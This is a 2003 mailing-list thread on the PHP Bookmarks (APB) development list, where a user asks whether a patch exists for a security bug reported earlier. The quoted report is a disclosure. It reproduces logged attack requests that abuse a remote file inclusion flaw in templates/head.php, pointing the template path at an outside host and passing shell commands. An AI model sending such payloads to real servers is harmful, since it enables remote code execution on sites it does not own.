From: Phillip S. <ph...@3b...> - 2003-03-24 19:06:08
|
Is there a patch for this yet? p. > -----Original Message----- > From: apb...@li... > [mailto:apb...@li...] On > Behalf Of Stefan May > Sent: March 9, 2003 2:43 PM > To: apb...@li... > Subject: [Apb-development] Security Bug > > > Hi all, > > I'm not subscribed to this list, so reply with Cc to me. > > Last night my site was hacked using PHP bookmarks. I like > this program very much, but this time I hated it. > > The "bug" is in /bookmarks/templates/head.php, you can set > the include path through normal http requests. The following > requests were made: > > GET > /bookmarks/templates/head.php?APB_SETTINGS%5Btemplate_path%5D= http://www.madsk8er.hpg.com.br/&cmd=id HTTP/1.1 GET /bookmarks/templates/head.php?APB_SETTINGS%5Btemplate_path%5D=http://www .madsk8er.hpg.com.br/&cmd=uname%20-a HTTP/1.1 and some more. For now I limited access to the template path. I'm not sure if I should use Safe Mode for PHP. Is this the better way? cu, Stefan. ------------------------------------------------------- This SF.net email is sponsored by: Etnus, makers of TotalView, The debugger for complex code. Debugging C/C++ programs can leave you feeling lost and disoriented. TotalView can help you find your way. Available on major UNIX and Linux platforms. Try it free. www.etnus.com _______________________________________________ Apb-development mailing list Apb...@li... https://lists.sourceforge.net/lists/listinfo/apb-development |